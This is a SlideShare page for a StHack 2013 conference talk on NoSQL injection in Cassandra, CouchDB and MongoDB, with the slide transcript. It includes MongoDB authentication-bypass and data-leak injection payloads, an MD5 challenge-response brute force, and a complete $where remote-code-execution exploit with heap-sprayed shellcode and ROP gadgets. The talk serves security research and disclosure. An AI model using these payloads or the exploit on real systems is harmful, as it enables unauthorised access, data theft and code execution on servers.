Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
No SQL injection but NoSQL Injection
NoSecurity or not ?
1
2
Plans
› What's/Why NoSQL ?
› Work in progress
› Cassandra
› CouchDB
› Mass pwnage...
3
NoSQL fashion way of life
› Database system
› ''Not only SQL''
› More simple
› Flexible Schema
› Easier scalability/repl...
4
NoSQL Hipsters
5
Cassandra
› Key-Value based
› Java
› HomeMade Protocol
› Port 9160
› SSL available
› Authentication available
› CQL
6
Cassandra › Let's find CQL injection
› Cassandra model
› Keyspace (=database)
› ColumnFamily (=table)
› Key with no fixe...
7
Cassandra › WHERE CONDITION
› No OR
› No UNION
› No subrequests
› Term must be indexed
columns
8
To be continued...
9
CouchDB
› Documents based
› Erlang
› RESTfull protocol
› SSL available
› Port 5984
› Authentication available
› Javascri...
10
CouchDB - RESTfull
› Use HTTP protocol only
› GET, PUT, POST, DELETE...
› curl -X PUT http://localhost:5984/test/
› cur...
11
CouchDB - Javascript
› JSON documents
› Special _design documents
› views
› shows
› lists
› validate_doc_update
› All i...
12
CouchDB - SSJI
› No function rewriting
› No variable leak
› _design leak
curl -X GET http://localhost:5984/my_db/_desig...
13
To be continued...
14
0day inside
15
mongoDB
› Documents based
› C/C++
› Home Made protocol
› SSL available
› Port 27017
› Authentication available
› Javasc...
16
mongoDB – Home Made Protocol
› Bson based
› Challenge response authentication
Nonce : e16fb6a8c31ac15a
User : agix
Key ...
17
./src/mongo/client/dbclient.cpp
Nonce : e16fb6a8c31ac15a
User : agix
Key : 3f5c7a073c3fb54c96b860b7f397bfc7
18
mongoDB – Home Made Protocol
key=md5(nonce+username+md5(username+':mongo :'+clearPassword))
Bruteforce !
md5('agix:mong...
19
mongoDB – Associative Array
› Database
Collections
Documents
› Data manipulation with JSON array
› db.my_collection.ins...
20
mongoDB – operators
› Only on update and find query
› Conditions
› Comparison ($gt, $in, $ne...)
› Logical ($and, $or, ...
21
mongoDB –
22
mongoDB –
› $_POST is an array
› login=test&pass=test => {'login' : 'test', 'pass' : 'test'}
› $_POST can be an associa...
23
mongoDB –
› Authentication bypass
› Informations leak ?
› login[$regex]=^.{4}$&pass[$ne]=test => {'login' : {'$regex' :...
24
mongoDB –
› $regex to get actual document leak
› More leak ?
› $WHERE !
› $where=1==1&login[$exists]=test&pass[$exists]...
25
mongoDB – Blind true/false based
› db.getCollectionNames().length
› db.getCollectionNames()[0][0]
› tojson(db.secret.fi...
26
mongoDB – What else
› Check javascript methods on mongo website
› http://docs.mongodb.org/manual/reference/method/run/
...
27
mongoDB – SSJI => RCE
function apply() {
[native code]
}
function () {
return nativeHelper.apply(run_, arguments);
}
ru...
28
./src/mongo/scripting/engine_spidermonkey.cpp
function apply() {
[native code]
}
function () {
return nativeHelper.appl...
29
mongoDB – SSJI => RCE
$where=nativeHelper.apply({"x" : 0x31337},
[])&login[$exists]=test&pass[$exists]=test
30
mongoDB – Exploitation
› JAVASCRIPT SERVER SIDE EXPLOIT !
› Write reliable exploit
› 32 bits binary
› NX bypass
› ASLR ...
31
mongoDB – Exploitation
db.my_collection.find({'$where':'tag=unescape("%udb31%ue3f7%u4353%u6a53%u8902%ub0e
1%ucd66%u9380...
32
mongoDB – Exploitation
› Land to the stack
› PIVOT 1
› [Eax] => pointer+0xb => nativeHelper argument
› Gadget 1 : Mov e...
33
mongoDB – Exploitation
› Control the stack
› UTF8 and no null byte in nativeHelper argument
› PIVOT 2 => to the rop cha...
34
mongoDB – Exploitation
› Execute shellcode
› First Heap Spray with nopsled+shellcode
› mmap RWX the heap
› Jump to the ...
35
mongoDB – Exploitation
› To improve
› Heap spray is for pork !
› 64 bits exploit... (null byte :o :o :o)
› Windows expl...
36
The end
› Still mongo 0day o/
› A lot of work to do...
› NoSQL is not so bad !
Upcoming SlideShare
Loading in …5
×

StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection

5,896 views

Published on

La mouvance NoSQL fait de plus en plus parler d'elle. La plupart du temps open source, les implémentations sont nombreuses et offrent des alternatives intéressantes à la rigidité du SQL. Malheureusement ces diverses solutions NoSQL (MongoDB, CouchDB, Cassandra...) débarquent avec NoSecurity. Nous verrons que, tout comme le SQL, une mauvaise utilisation des clients/drivers peut avoir des conséquences tout aussi critique, si ce n'est plus...

Published in: Technology
  • Be the first to comment

StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection

  1. 1. No SQL injection but NoSQL Injection NoSecurity or not ? 1
  2. 2. 2 Plans › What's/Why NoSQL ? › Work in progress › Cassandra › CouchDB › Mass pwnage...
  3. 3. 3 NoSQL fashion way of life › Database system › ''Not only SQL'' › More simple › Flexible Schema › Easier scalability/replication › No SQL language › Young and hipster
  4. 4. 4 NoSQL Hipsters
  5. 5. 5 Cassandra › Key-Value based › Java › HomeMade Protocol › Port 9160 › SSL available › Authentication available › CQL
  6. 6. 6 Cassandra › Let's find CQL injection › Cassandra model › Keyspace (=database) › ColumnFamily (=table) › Key with no fixed Columns › OR 1=1 ?
  7. 7. 7 Cassandra › WHERE CONDITION › No OR › No UNION › No subrequests › Term must be indexed columns
  8. 8. 8 To be continued...
  9. 9. 9 CouchDB › Documents based › Erlang › RESTfull protocol › SSL available › Port 5984 › Authentication available › Javascript based
  10. 10. 10 CouchDB - RESTfull › Use HTTP protocol only › GET, PUT, POST, DELETE... › curl -X PUT http://localhost:5984/test/ › curl -X POST http://localhost:5984/test/ -H "Content-Type: application/json" -d {name : 'value'} › curl -X GET http://localhost:5984/test/_all_docs › curl -X DELETE http://localhost:5984/test/ › CSRF ? › SOP protected
  11. 11. 11 CouchDB - Javascript › JSON documents › Special _design documents › views › shows › lists › validate_doc_update › All in JS › SSJI ?
  12. 12. 12 CouchDB - SSJI › No function rewriting › No variable leak › _design leak curl -X GET http://localhost:5984/my_db/_design/articles/_show/eval/? test=JSON.stringify(this.validate_doc_update) "function(newDoc, oldDoc, userCtx) { if(newDoc.auth!='secret') { throw('NO!'); } }"
  13. 13. 13 To be continued...
  14. 14. 14 0day inside
  15. 15. 15 mongoDB › Documents based › C/C++ › Home Made protocol › SSL available › Port 27017 › Authentication available › Javascript based
  16. 16. 16 mongoDB – Home Made Protocol › Bson based › Challenge response authentication Nonce : e16fb6a8c31ac15a User : agix Key : 3f5c7a073c3fb54c96b860b7f397bfc7
  17. 17. 17 ./src/mongo/client/dbclient.cpp Nonce : e16fb6a8c31ac15a User : agix Key : 3f5c7a073c3fb54c96b860b7f397bfc7
  18. 18. 18 mongoDB – Home Made Protocol key=md5(nonce+username+md5(username+':mongo :'+clearPassword)) Bruteforce ! md5('agix:mongo:toto')='1fdea392256218a5f3afa9918733fab4' md5('e16fb6a8c31ac15aagix1fdea392256218a5f3afa9918733fab4')= e16fb6a8c31ac15aagix1fdea392256218a5f3afa9918733fab4!=key md5('agix:mongo:password')='725d67fffa6b8fc54b6950407f9dc810' md5('e16fb6a8c31ac15aagix725d67fffa6b8fc54b6950407f9dc810')= '3f5c7a073c3fb54c96b860b7f397bfc7'==key Key : 3f5c7a073c3fb54c96b860b7f397bfc7
  19. 19. 19 mongoDB – Associative Array › Database Collections Documents › Data manipulation with JSON array › db.my_collection.insert({key_name:"value",my_array:[1,2,3], my_assoc_array:{key1_name:"value",key2_name:"value"}}) › db.my_collection.find({key_name : "value"}) › Special KeyName : operator
  20. 20. 20 mongoDB – operators › Only on update and find query › Conditions › Comparison ($gt, $in, $ne...) › Logical ($and, $or, $nor, $not) › Element ($exists, $type, $mod) › Javascript ($where, $regex) › › Data manipulation with JSON array › db.my_collection.find({key_name : {$exists:true, $in:[1,2,3]}})
  21. 21. 21 mongoDB –
  22. 22. 22 mongoDB – › $_POST is an array › login=test&pass=test => {'login' : 'test', 'pass' : 'test'} › $_POST can be an associative array › login[$ne]=test&pass[$ne]=test => {'login' : {'$ne' : 'test'}, 'pass' : {'$ne' : 'test'}}
  23. 23. 23 mongoDB – › Authentication bypass › Informations leak ? › login[$regex]=^.{4}$&pass[$ne]=test => {'login' : {'$regex' : '^a.*'}, 'pass' : {'$ne' : 'test'}} › login[$regex]=^a.*$&pass[$ne]=test => {'login' : {'$regex' : '^a.*'}, 'pass' : {'$ne' : 'test'}}
  24. 24. 24 mongoDB – › $regex to get actual document leak › More leak ? › $WHERE ! › $where=1==1&login[$exists]=test&pass[$exists]=test
  25. 25. 25 mongoDB – Blind true/false based › db.getCollectionNames().length › db.getCollectionNames()[0][0] › tojson(db.secret.find({},{_id:0})[0])[3]
  26. 26. 26 mongoDB – What else › Check javascript methods on mongo website › http://docs.mongodb.org/manual/reference/method/run/ › Let's check internal usage...
  27. 27. 27 mongoDB – SSJI => RCE function apply() { [native code] } function () { return nativeHelper.apply(run_, arguments); } run nativeHelper.apply
  28. 28. 28 ./src/mongo/scripting/engine_spidermonkey.cpp function apply() { [native code] } function () { return nativeHelper.apply(run_, arguments); } run nativeHelper.apply
  29. 29. 29 mongoDB – SSJI => RCE $where=nativeHelper.apply({"x" : 0x31337}, [])&login[$exists]=test&pass[$exists]=test
  30. 30. 30 mongoDB – Exploitation › JAVASCRIPT SERVER SIDE EXPLOIT ! › Write reliable exploit › 32 bits binary › NX bypass › ASLR bypass › Not stack overflow › No stack control › EIP is not enough
  31. 31. 31 mongoDB – Exploitation db.my_collection.find({'$where':'tag=unescape("%udb31%ue3f7%u4353%u6a53%u8902%ub0e 1%ucd66%u9380%ub059%ucd3f%u4980%uf979%uac68%u9310%u6801%u0002%u697a %ue189%u66b0%u5150%ub353%u8903%ucde1%u5280%u2f68%u732f%u6868%u622f %u6e69%ue389%u5352%ue189%u0bb0%u80cd"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0, (sizechunk-tag.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+tag; } tag2=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c %u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++) { chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2- tag2.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+tag2; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"x26x18x35x08"+"MongoSploit!"+"x58x71x45x08"+"sthack is a nice place to be"+"x6cx5ax05x08"+"x20x20x20x20"+"x58x71x45x08"]);','login':{$exists:'toto'},'pass': {$exists:'toto'}})
  32. 32. 32 mongoDB – Exploitation › Land to the stack › PIVOT 1 › [Eax] => pointer+0xb => nativeHelper argument › Gadget 1 : Mov eax, [eax] … call [eax+0x1c] › nativeHelper argument is UTF8 encoded without null byte › eax+0x1c : gadget 2 : xchg esp, eax [inc esp], ret › Esp-1 => begining of nativeHelper argument › Gadget 3 : [inc esp] to clean stack control
  33. 33. 33 mongoDB – Exploitation › Control the stack › UTF8 and no null byte in nativeHelper argument › PIVOT 2 => to the rop chain heap sprayed › Gadget 4 : pop eax, ... ret › Eax => rop chain in the heap (0x20202020) › Gadget 5 : xchg esp,eax … ret › RetSled › Stack control done !
  34. 34. 34 mongoDB – Exploitation › Execute shellcode › First Heap Spray with nopsled+shellcode › mmap RWX the heap › Jump to the heap (0x0C0C0C0C) › Enjoy !
  35. 35. 35 mongoDB – Exploitation › To improve › Heap spray is for pork ! › 64 bits exploit... (null byte :o :o :o) › Windows exploit › Multiple version exploit
  36. 36. 36 The end › Still mongo 0day o/ › A lot of work to do... › NoSQL is not so bad !

×